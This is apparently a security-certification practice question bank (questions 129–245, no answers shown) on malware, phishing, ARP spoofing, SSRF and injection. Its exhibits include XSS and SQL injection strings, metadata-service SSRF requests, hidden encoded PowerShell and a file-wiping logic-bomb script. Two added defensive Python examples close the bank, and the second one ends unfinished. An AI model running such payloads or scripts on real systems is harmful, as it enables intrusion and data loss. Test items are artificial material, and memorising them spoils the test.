After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?

Question 129 (easy, multiple choice)

After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?

Question 130 (easy, multiple choice)

A customer enters `<script>alert('test')</script>` into a public forum signature field. Later, other users who view that signature see the script execute in their browsers. What attack is this?

Question 131 (easy, multiple choice)

A help desk technician receives an email that appears to come from the payroll provider. The message says the employee's direct deposit will be suspended unless they verify their account through a link. What type of attack is this?

Question 132 (hard, multiple choice)

An accounts payable specialist receives a reply inside an existing vendor email thread. The message uses the real invoice number, matches the vendor's usual tone, and asks the specialist to change payment instructions to a new bank account before the end of the day. The vendor later confirms its mailbox was compromised. What type of attack is most likely?

Question 133 (medium, multiple choice)

A VPN concentrator shows that an authentication request from a user was accepted twice, even though the user insists they approved only one login. Packet analysis reveals that the second successful attempt reused the same authentication blob and arrived shortly after the first. Which attack is the best fit?

Question 134 (medium, multiple choice)

A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?

Question 135 (hard, multiple choice)

A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?

Question 136 (medium, multiple choice)

A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?

Question 137 (easy, multiple choice)

A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?

Question 138 (hard, multiple choice)

After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?

Question 139 (medium, multiple choice)

A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

Question 140 (easy, multiple choice)

An employee receives a text message that says, "Your MFA enrollment expired. Tap here now to re-activate access or your account will be locked." What should the employee do first?

Question 141 (easy, multiple choice)

Users can reach the correct website name, but their browsers are redirected to a fake server after the local DNS cache is altered. What attack is most likely?

Question 142 (medium, multiple choice)

A help desk agent receives a phone call from someone claiming to be a regional sales manager who says they are locked out before a customer demo. The caller knows a few employee names and asks the agent to reset the account and temporarily bypass MFA. What attack is most likely?

Question 143 (medium, multiple choice)

Based on the exhibit, what type of malware is the most likely issue on the workstation?

Exhibit

Help desk incident notes:

- User installed a free video converter from an unofficial download site.
- Browser home page changed without permission.
- A new extension appeared named "QuickSearch Helper".
- Outbound traffic to tracking.example-cdn.net increased every few minutes.
- The endpoint security console reports that saved browser cookies were accessed by an unknown process.

Question 144 (medium, multiple choice)

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

Question 145 (easy, multi select)

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Question 146 (easy, multiple choice)

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

Question 147 (hard, multiple choice)

An accounts payable clerk receives an email that appears to continue an existing thread with a shipping vendor. The sender name, signature block, and invoice number all match a real open order, and the message asks the clerk to use a "new payment portal" and confirm bank details before 3 PM to avoid delayed shipment. The email contains no attachments and only one URL. Which attack type is most likely?

Question 148 (medium, multiple choice)

A vulnerability scan finds that an administrative SSH service on a Linux server is listening on 0.0.0.0 and is reachable from the internet. The server is meant to be managed only from the internal admin subnet. What is the best remediation?

Question 149 (hard, multiple choice)

A SaaS dashboard invalidates passwords after a forced reset, but a stolen bearer token from a browser cookie still works from a VPN exit node for several hours. SIEM logs show the same token value used from two countries within five minutes, and no MFA prompt appears because the token is already accepted. What attack is most likely?

Question 150 (easy, multiple choice)

A person wearing a contractor badge asks reception to let them into the office because they forgot their access card and says they are expected for a server maintenance visit. What social engineering technique is most likely?

Question 151 (easy, multiple choice)

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

Question 152 (hard, multiple choice)

A facilities manager receives an SMS from "FedEx Delivery" saying a shipment for the research lab cannot clear security until the recipient verifies the package by signing in. The message includes the manager's initials and the warehouse code, and the link opens a cloned sign-in page. Which attack is most likely?

Question 153 (medium, multiple choice)

A company portal lets employees save a short profile bio. One employee enters a string containing script code, and later other users who view that profile are redirected to a fake sign-in page. What vulnerability best explains this behavior?

Question 154 (medium, multiple choice)

A finance analyst receives an email that appears to come from the CFO. It references a real project, asks for an urgent wire transfer to a "new vendor account," and says to avoid the normal approval workflow because the deal is time-sensitive. What is the best immediate response?

Question 155 (medium, multiple choice)

A Java-based internal portal accepts a serialized object during profile import. After a recent test upload, the server made outbound LDAP calls and created a new local account. What attack pattern best explains this behavior?

Question 156 (easy, multiple choice)

A login form sends user input directly into a database query. When a tester enters a single quote character, the application returns a database error. What attack is most likely?

Question 157 (medium, multiple choice)

Based on the exhibit, what type of attack is most likely being used against the accounts payable team?

Exhibit

Email header excerpt:
From: "Evan Brooks" <evan.brooks@northstar-invoices.co>
To: ap-team@contoso.example
Subject: Updated pricing for Project Orion - action needed today

Message body:
Hi Lena,
Per our call last week about Project Orion, please review the revised pricing sheet attached.
The customer asked for approval before 3:00 PM so we can keep the launch on schedule.
If the file does not open, reply here and I will send a new link.

Question 158 (hard, multiple choice)

A help desk technician receives a call from someone claiming to be a new contractor whose MFA app failed during travel. The caller knows the company org chart, names the technician's supervisor, and says the technician should use a callback number included in a text message they just sent. What is the safest first action?

Question 159 (medium, multiple choice)

Users on a wired subnet report intermittent outages when reaching an internal application. A packet capture shows the default gateway IP address repeatedly mapped to a different workstation MAC address, and traffic is being forwarded through that workstation. What attack is most likely occurring?

Question 160 (hard, multiple choice)

A Linux server is missing expected security-agent processes, but users can still connect to the application. Local command output does not show a suspicious daemon that another monitoring tool says is listening on port 4444. A raw disk scan reveals a kernel module loaded at boot, and several files appear only when viewed outside the normal operating system tools. What malware type is most likely?

Question 161 (easy, multi-select)

A user's workstation suddenly renames documents with a new extension, displays a ransom note, and blocks access to a shared drive. Which two indicators support ransomware? Select two.

Question 162 (hard, multiple choice)

Users on a branch VLAN intermittently reach a fake login page even though DNS records have not changed. A packet capture shows the default gateway MAC address changing every 60 seconds, and the switch logs list repeated unsolicited ARP replies from one workstation. Which attack is most likely?

Question 163 (hard, multiple choice)

A tester enters a crafted search term into an internal web application and sees no error message, but the page response always delays by exactly five seconds when the input includes a single quote followed by a conditional sleep function. The returned results look normal, so the tester repeats the request several times and the timing remains consistent. Which attack is most likely being attempted?

Question 164 (medium, multiple choice)

After a workstation reboot, users see many files renamed with random extensions. A ransom note demands cryptocurrency, and Volume Shadow Copies were deleted from the machine. What malware type is most likely?

Question 165 (medium, multiple choice)

Based on the exhibit, which security issue should the analyst report first?

Exhibit

External vulnerability scan summary for a small branch office server:

Host: 203.0.113.44
Open ports:
  22/tcp  open  ssh
  80/tcp  open  http
  5900/tcp open  vnc
Findings:
  - VNC authentication: disabled
  - SSH: restricted to password login only
  - Web admin page accessible from any source network
  - Server is in the DMZ and stores customer support tickets

Question 166 (medium, multiple choice)

After a facilities outage, multiple employees report that their phones automatically joined a network named "CorpWiFi" in the lobby even though the legitimate access point was offline. A nearby attacker device then captured the captive portal login traffic. What attack is most likely?

Question 167 (hard, multiple choice)

Based on the exhibit, which social engineering attack is most likely?

Exhibit

Help desk voicemail transcript:
'Hi, this is Elena from identity operations. I opened ticket INC-7712 because your MFA app is out of sync. Read me the 6-digit code that just arrived so I can clear the lockout before payroll closes.'
Ticketing system: no open ticket INC-7712 exists
Caller ID displayed: corporate main line

Question 168 (easy, multiple choice)

An EDR alert shows PowerShell launching from a scheduled task, downloading encoded commands, and running them in memory. No suspicious executable is written to disk. What kind of attack is this?

Question 169 (easy, multiple choice)

A laptop user reports that many files now have strange extensions, a ransom note appears on the desktop, and the files cannot be opened. Which malware is most likely responsible?

Question 170 (easy, multiple choice)

A caller says they are from IT support and asks a user to read back the one-time MFA code that just arrived on their phone. What type of attack is this most likely?

Question 171 (easy, multiple choice)

A vulnerability scanner reports a critical issue on a Linux server. The administrator checks the application and confirms the vulnerable package is installed, but the affected feature is not enabled anywhere in production. What should the security team do next?

Question 172 (easy, multiple choice)

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."

Question 173 (medium, multi-select)

Users on one VLAN report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows unsolicited ARP replies claiming to be the gateway. Which two actions are the best mitigations on managed switches? Select two.

Question 174 (medium, multiple choice)

Based on the exhibit, which control should be enabled to mitigate this issue?

Exhibit

Packet Capture Summary
Host 10.20.30.44 sends repeated ARP replies:
  "10.20.30.1 is at 00:11:22:33:44:55"
  "10.20.30.1 is at 00:11:22:33:44:55"
Switch logs:
  DHCP snooping: disabled
  ARP inspection: disabled
Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.

Question 175 (medium, multiple choice)

A help desk technician receives a phone call from someone who claims to be the CFO. The caller knows the executive team structure, says they are traveling, and insists the technician reset MFA to 'avoid delaying a wire transfer.' Which social engineering technique is the caller primarily using?

Question 176 (easy, multiple choice)

Based on the exhibit, what type of malware is most likely present?

Exhibit

Task Scheduler entry on FIN-SRV2:
Task Name: MonthlyCleanup
Trigger: 12/31/2026 18:00
Action: powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\cleanup.ps1
Script contents:
if ($env:USERNAME -eq 'j.smith') { Remove-Item C:\Finance\Archive\* -Recurse -Force }
Security note: The script was added by a former contractor before departure.

Question 177 (medium, multiple choice)

A SOC analyst reviews an alert on a workstation where PowerShell launched from a scheduled task, downloaded an encoded command from a remote server, and then spawned rundll32.exe. Traditional antivirus did not flag any files on disk, and the activity stops after rebooting the host. Which type of malware behavior best fits this event?

Question 178 (easy, multiple choice)

A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?

Question 179 (medium, multiple choice)

A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?

Question 180 (easy, multiple choice)

Based on the exhibit, what type of threat is the security team most likely seeing on the workstation?

Exhibit

EDR Alert - WS-14
Time: 03:14:22
Parent process: svchost.exe
Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <redacted>
Network activity: HTTPS request to hxxps://updates-check[.]com/a7
File creation: none detected
Registry change: Run key modified under HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Question 181 (medium, multiple choice)

A help desk technician receives a phone call from someone who claims to be the CFO. The caller says they are traveling, cannot access their MFA app, and needs the technician to reset the account immediately. They also ask the technician to read back the one-time code sent to the executive's phone so they can "verify identity." What type of attack is this most likely?

Question 182 (medium, multiple choice)

A cloud-hosted application allows users to submit a URL for image processing. Logs show repeated requests such as `http://169.254.169.254/latest/meta-data/` and `http://localhost/admin`. The server is making outbound requests on behalf of the user input. What is the best defensive control to implement?

Question 183 (medium, multiple choice)

A web service begins experiencing severe latency. NetFlow shows thousands of short DNS queries leaving the attacker network, while a much larger volume of DNS responses is arriving at the victim's public IP address from many open resolvers. Which attack is most likely occurring?

Question 184 (easy, multiple choice)

Employees in a lobby report that their phones automatically connected to a wireless network named "CorpWiFi." Soon after, they were prompted to sign in through a web page that did not look like the normal company portal. What attack is most likely?

Question 185 (easy, multiple choice)

An employee gets a text message saying their mobile carrier will suspend service unless they tap a link and verify their account details. What type of attack is this?

Question 186 (medium, multiple choice)

A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?

Question 187 (medium, multiple choice)

A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?

Question 188 (easy, multiple choice)

A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?

Question 189 (easy, multiple choice)

Based on the exhibit, which attack is the developer most likely observing?

Exhibit

Application log excerpt:
GET /thumbnail?imageUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/
Response status: 200
Returned content includes cloud role names and temporary credentials metadata
Web server outbound connection recorded to the local metadata address

Question 190 (medium, multi-select)

A SOC analyst reviews an EDR alert on a finance workstation. The alert shows powershell.exe launched with an encoded command, downloaded a payload into memory, and then spawned rundll32.exe. No new executable was written to disk, but the process later created a scheduled task for persistence. Which two findings most strongly support a fileless attack? Select two.

Question 191 (medium, multiple choice)

A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?

Question 192 (easy, multiple choice)

An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?

Question 193 (medium, multiple choice)

An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?

Question 194 (easy, multiple choice)

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

Question 195 (medium, multiple choice)

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

Question 196 (medium, multiple choice)

Several employees in a branch office report that their laptops automatically connected to a network named "CorpWiFi" even though they were away from the office. Shortly afterward, a few users saw a captive portal asking them to re-enter company credentials. Which threat best explains this situation?

Question 197 (easy, multiple choice)

Based on the exhibit, which supply-chain threat is most likely?

Exhibit

Build pipeline notes:
- Package manager updated dependency: "fast-logger" from 2.4.1 to 2.4.2
- New outbound connection at startup: api.fast-logger-support[.]com
- No code changes were made by the development team
- Security review note: "Dependency source is a recently created public repository account"

Question 198 (easy, multiple choice)

A development team updates a third-party software library used by its web application. After the release, new deployments begin making unexpected outbound connections to an unfamiliar domain. What type of threat is most likely?

Question 199 (medium, multiple choice)

A public-facing web service suddenly becomes very slow. NetFlow shows a high volume of small DNS queries leaving attacker-controlled systems and much larger DNS responses arriving at the victim's IP address from many different resolvers. Which attack is taking place?

Question 200 (easy, multiple choice)

A security team can patch only one system today. Which asset should be remediated first?

Question 201 (medium, multiple choice)

A scanner reports a critical vulnerability on an internal Linux server. The administrator confirms the vulnerable package is installed, but the affected feature is only enabled when an optional module is loaded, and that module is currently disabled. The server also requires downtime for patching. What is the best next step?

Question 202 (medium, multiple choice)

A scanner reports a critical vulnerability on an internal Linux server. The administrator verifies the package is installed, but the vulnerable code path is only present in a plugin that has been disabled and removed from the service startup. The server cannot be patched until a vendor maintenance window next month. What is the best next step?

Question 203 (medium, multiple choice)

Based on the exhibit, what is the most likely issue with the software component being built?

Exhibit

CI Build Output
Downloading package: report-utils@4.2.0
Expected integrity: sha512-F3d9e2f0e3a9c1...
Actual integrity:   sha512-7ab4d1c19f0a22...
Source registry: registry.example.net
Build status: WARN - package checksum mismatch
Developer note: The update was pulled automatically during the nightly pipeline.

Question 204 (hard, multiple choice)

Based on the exhibit, which vulnerability is being exploited?

Exhibit

Reverse proxy config excerpt:
proxy_set_header X-Original-URL $request_uri;
proxy_set_header X-Forwarded-User $remote_user;

Access log:
GET /app/report HTTP/1.1 200
X-Original-URL: /admin/export
X-Forwarded-User: jlee

Backend log:
09:41:11 GET /admin/export user=jlee role=analyst response=200
09:41:13 POST /admin/export user=jlee role=analyst response=200

Question 205 (easy, multiple choice)

Employees in a lobby say their phones automatically connected to a wireless network named CorpWiFi, even though the legitimate access point was offline. They were then shown a fake sign-in page. What threat is this?

Question 206 (medium, multiple choice)

A file-conversion API accepts a URL to generate a preview image. An attacker submits a URL for the cloud metadata service at 169.254.169.254 and receives instance credentials in the preview output. What attack is this?

Question 207 (medium, multiple choice)

An administrator notices that a finance file share remained normal for weeks after a former contractor left the company. This morning, multiple PDFs and spreadsheets were deleted, and a scheduled task created months ago is now executing a script that wipes files in the shared folder. Which malware type is most consistent with this behavior?

Question 208 (medium, multi-select)

A help desk technician receives a phone call from someone claiming to be the VP of Finance. The caller says they are in an airport, forgot their phone, and need a password reset immediately. They also ask the technician to skip callback verification because a meeting starts in five minutes. Which two details are the strongest indicators of a pretexting or vishing attempt? Select two.

Question 209 (hard, multiple choice)

Based on the exhibit, which finding should be remediated first?

Exhibit

Vulnerability review summary:

Finding A: CVE-2025-1184 | DMZ web server | Internet-facing | Remote code execution | Exploit in the wild | Patch available
Finding B: CVE-2025-4420 | Engineering laptop | Internal-only lab VLAN | CVSS 9.8 | Requires local access | No network path
Finding C: CVE-2025-6011 | File server | Internal network | Requires authenticated user | Compensating ACL restricts access
Finding D: CVE-2025-7044 | Backup appliance | Internal network | No patch yet | Vendor says issue is unreachable from network

Question 210 (medium, multiple choice)

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

Question 211 (hard, multiple choice)

Based on the exhibit, what is the most likely explanation for the suspicious workstation activity?

Exhibit

EDR summary:
- Parent process: taskeng.exe
- Child process: powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ...
- No new executable files were created in user profile folders
- Scheduled task 'UpdateSvc' launches every 5 minutes
- Outbound TLS connections to 198.51.100.77 occur immediately after execution

Question 212 (medium, multiple choice)

A support portal searches customers by last name using a parameter called q. After one user enters a single quote, the app returns a SQL syntax error. A tester then submits `test' OR '1'='1` and sees every customer record. Which control most directly prevents this issue?

Question 213 (hard, multiple choice)

Based on the exhibit, which attack is most likely occurring on the local network?

Exhibit

Host 192.0.2.45 arp -a
Internet Address      Physical Address      Type
192.0.2.1             00-50-56-a1-b2-c3     dynamic
192.0.2.1             00-50-56-a1-b2-c4     dynamic

Packet capture:
10:14:02 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:03 ARP Reply: 192.0.2.1 is-at 00:50:56:a1:b2:c4
10:14:05 Gateway traffic is briefly forwarded to 192.0.2.200

Switch CAM table:
Gi1/0/7   00:50:56:a1:b2:c4
Gi1/0/24  00:50:56:a1:b2:c4

Question 214 (medium, multiple choice)

Based on the exhibit, which attack is most likely being attempted against the application?

Exhibit

Web Access Log
2026-04-17T10:22:11Z "GET /thumb?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1" 200 512
2026-04-17T10:22:14Z "GET /thumb?url=http://10.0.5.14:8080/admin HTTP/1.1" 200 133
Application server outbound connections observed to internal RFC1918 addresses after each request.

Question 215 (medium, multiple choice)

A finance application works normally for weeks after a contractor leaves the company. On the first business day of the quarter, a hidden task runs, deletes archived reports, and then removes itself from the scheduled task list. What type of malware behavior is this?

Question 216 (easy, multiple choice)

Several users on the same subnet report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows ARP replies that map the gateway IP to a different MAC address. What attack is most likely occurring?

Question 217 (medium, multiple choice)

A vulnerability scan reports a critical finding on a legacy application server. The security team verifies that the flagged package is installed, but the vulnerable code path is disabled by configuration and cannot be exploited in the current deployment. The vendor will not support a patch until next quarter. What is the best next step?

Question 218 (medium, multiple choice)

Several users on the same subnet report intermittent loss of access to the default gateway. A packet capture shows repeated unsolicited ARP replies mapping the gateway IP address to a different MAC address. Traffic is occasionally sent through an unknown workstation. What attack is most likely occurring?

Question 219 (easy, multiple choice)

Based on the exhibit, which finding should the security team remediate first?

Exhibit

Weekly vulnerability scan summary:
1. WEB01 - Public web server - Critical CVE with known exploit and no compensating control
2. FILE02 - Internal file server - Medium severity missing patch
3. LAP09 - User laptop - Low severity browser plug-in issue
4. PRN01 - Network printer - Informational firmware notice only

Question 220 (hard, multiple choice)

Based on the exhibit, which malware type best explains the behavior?

Exhibit

Administrator checks a suspected host:
tasklist /svc | findstr vpn
(no output)

netstat -ano | findstr 51433
TCP    0.0.0.0:51433     0.0.0.0:0     LISTENING     4

driverquery /v | findstr /i kbdflt2
kbdflt2.sys    Unknown    C:\Windows\System32\drivers\kbdflt2.sys

EDR note:
Process enumeration from user mode does not match kernel event telemetry.

Question 221 (medium, multiple choice)

A SOC analyst reviews an EDR alert on a Windows workstation. PowerShell was launched by a scheduled task, downloaded an encoded command from an external server, and then spawned rundll32.exe. No suspicious executable was written to disk. Which type of threat best fits this activity?

Question 222 (medium, multiple choice)

A help desk analyst receives a ticket stating that an employee got an urgent text message from someone claiming to be the CEO. The message asked the employee to buy gift cards and send the redemption codes immediately. What attack is most likely taking place?

Question 223 (hard, multi-select)

During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.

Question 224 (hard, multi-select)

During a workstation review, analysts find a process injecting into explorer.exe and reading keyboard and clipboard events. They also see repeated outbound HTTPS beacons to a domain registered two days ago. The host is not renaming files or displaying a ransom note. Which two findings are most consistent with spyware? Select two.

Question 225 (medium, multiple choice)

A vulnerability scan reports three findings: a critical remote code execution issue on an internet-facing VPN appliance with a public exploit, a high-severity local privilege escalation on an isolated lab PC, and a medium-severity outdated browser plug-in on a workstation used for training. Which finding should be remediated first?

Question 226 (hard, multi-select)

A branch office reports intermittent failures reaching internal sites. DHCP logs show clients receiving leases from an unknown MAC address, and DNS responses for intranet.example resolve to an address owned by the same device. Which two attacks best match the evidence? Select two.

Question 227 (medium, multiple choice)

A vulnerability scan produces these results:
- Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls
- Finding 2: Critical severity, internal development workstation, requires authenticated local access
- Finding 3: Medium severity, test server, no public exploit and not reachable from outside
Which finding should be remediated first?

Question 228 (medium, multiple choice)

Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?

Question 229 (medium, multiple choice)

A support agent notices that changing `invoiceId=8842` to `invoiceId=8843` in a portal URL returns another customer's invoice PDF without any additional login prompt. The user is already authenticated to the application. Which vulnerability is most likely present?

Question 230 (hard, multi-select)

A SOC analyst reviews a suspicious email about an overdue invoice. The display name matches a known supplier, but the envelope sender is from a free webmail domain, and the Reply-To address uses a look-alike domain with one swapped letter. The message also includes a company logo and a PDF attachment. Which two findings are the strongest indicators of a phishing attempt? Select two.

Question 231 (medium, multiple choice)

A firewall analyst reviews logs and sees one external IP address sending connection attempts to TCP ports 22, 80, 139, 445, and 3389 on dozens of internal hosts every few seconds. No payloads are delivered and no sessions are established. What is the most likely activity?

Question 232 (hard, multi-select)

An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.

Question 233 (medium, multiple choice)

Users on the same VLAN report that their browser occasionally reaches a fake internal portal, and packet captures show one host sending forged ARP replies that claim to be the default gateway. Traffic from nearby systems begins flowing through that host. Which attack is occurring?

Question 234 (medium, multiple choice)

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

Question 235 (medium, multiple choice)

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

Question 236 (hard, multi select)

A packet capture from a branch office shows the default gateway IP mapped to a MAC address that does not belong to the router. The same suspicious MAC also answers for the DNS server IP, and gratuitous ARP replies appear every 30 seconds. Which two attacks best match this evidence? Select two.
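
One detector covering both the ARP scenario in Question 233 and the gateway-plus-DNS evidence in Question 236, as an added example that is not part of the question bank. The trusted IP-to-MAC bindings and the capture records are constructed for the example; on a real network the bindings would come from the switch's DHCP snooping table or a maintained inventory.

```python
# Added example (not from the question bank): detection logic for the two
# ARP scenarios above, run over a constructed ARP capture. Infrastructure MACs
# and the capture itself are made up for the example.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since capture start
    sender_ip: str     # "I am this IP ..."
    sender_mac: str    # "... at this MAC"
    gratuitous: bool   # reply nobody asked for


# Assumed trusted IP -> MAC bindings for the gateway and the DNS server.
TRUSTED: Dict[str, str] = {
    "10.10.0.1": "00:11:22:aa:bb:01",
    "10.10.0.53": "00:11:22:aa:bb:53",
}

ROGUE = "de:ad:be:ef:00:01"

# Constructed capture: legitimate answers first, then one host claiming both
# infrastructure IPs with gratuitous replies every 30 seconds.
CAPTURE: List[ArpReply] = [
    ArpReply(0.0, "10.10.0.1", "00:11:22:aa:bb:01", False),
    ArpReply(0.2, "10.10.0.53", "00:11:22:aa:bb:53", False),
    ArpReply(1.0, "10.10.0.77", "00:11:22:cc:dd:77", False),
] + [
    ArpReply(5.0 + 30 * n + off, ip, ROGUE, True)
    for n in range(3)
    for off, ip in ((0.0, "10.10.0.1"), (0.1, "10.10.0.53"))
]


def analyze(capture: List[ArpReply], trusted: Dict[str, str]) -> List[Tuple]:
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    grat_times = defaultdict(list)          # (mac, ip) -> timestamps
    for r in capture:
        ip_to_macs[r.sender_ip].add(r.sender_mac)
        mac_to_ips[r.sender_mac].add(r.sender_ip)
        if r.gratuitous:
            grat_times[(r.sender_mac, r.sender_ip)].append(r.ts)

    findings = []
    # 1. A trusted IP answered by a MAC other than its known binding.
    for ip, good_mac in trusted.items():
        for mac in sorted(ip_to_macs[ip] - {good_mac}):
            findings.append(("spoofed_claim", ip, mac))
    # 2. One untrusted MAC claiming several infrastructure IPs (gateway + DNS).
    for mac, ips in mac_to_ips.items():
        hijacked = tuple(sorted(ips & set(trusted)))
        if len(hijacked) > 1 and mac not in trusted.values():
            findings.append(("multi_ip_claim", mac, hijacked))
    # 3. Periodic gratuitous replies: the attacker re-asserting the poisoned entry
    #    before the victims' ARP caches expire.
    for (mac, ip), times in grat_times.items():
        if len(times) >= 3:
            gaps = [b - a for a, b in zip(times, times[1:])]
            if max(gaps) - min(gaps) < 1.0:
                findings.append(("periodic_gratuitous", mac, ip, round(sum(gaps) / len(gaps), 1)))
    return findings
```

The third rule is what separates active poisoning from a one-off misconfiguration: a host with a duplicate address answers when asked, while an attacker has to keep re-sending because the real gateway keeps correcting the victims' caches.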

Question 237 (medium, multiple choice)

A help desk analyst receives a phone call from someone claiming to be the CFO, who says their phone was lost while traveling and requests an immediate MFA reset and temporary bypass for payroll access. The caller knows the CFO's last name and the company name, but cannot answer the callback verification question. What attack technique is most likely being used?

Question 238 (medium, multiple choice)

A workstation starts failing security checks. The antivirus service no longer appears in the running process list, a known driver's hash does not match the vendor's value, and a task manager view shows fewer processes than expected. The user also reports that local admin tools behave inconsistently. What type of malware is most likely present?

Question 239 (medium, multiple choice)

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

Question 240 (medium, multiple choice)

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

Question 241 (medium, multiple choice)

Several employees report receiving SMS messages that appear to come from the corporate service desk. The text says, 'Your password expires today. Review the notice here,' followed by a shortened link that opens a fake sign-in page on a phone browser. Which type of attack is this?

Question 242 (medium, multiple choice)

An API log shows repeated requests such as `GET /api/orders?orderId=105%20OR%201=1--` followed by responses containing many customers' order records instead of one record. Which attack is most likely?

Question 243 (medium, multiple choice)

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

Question 244 (medium, multiple choice)

A user forwards an email that says their payroll account will be disabled today unless they click a link and verify their password. The message uses the company logo, but the sender address is from a free webmail domain and the link goes to a look-alike login page. What type of attack is this?

Question 245 (easy, multi select)

A user forwards an email that says a shared document is available and must be reviewed within 10 minutes. The display name looks like a trusted vendor, but the Reply-To address points to a free webmail account. Which two details are strongest indicators that this is a phishing attempt? Select two.
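
The header checks behind Questions 230, 244 and 245 (display name versus sending domain, free webmail envelope sender, mismatched Reply-To, look-alike domain, urgency), as an added example that is not part of the question bank. The vendor list, the webmail list and both messages are constructed; a real triage script would also read SPF, DKIM and DMARC results from the Authentication-Results header.

```python
# Added example (not from the question bank): header-level triage for the
# phishing scenarios above. Vendor list, webmail list and both messages are
# constructed for the example.
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List, Set, Tuple

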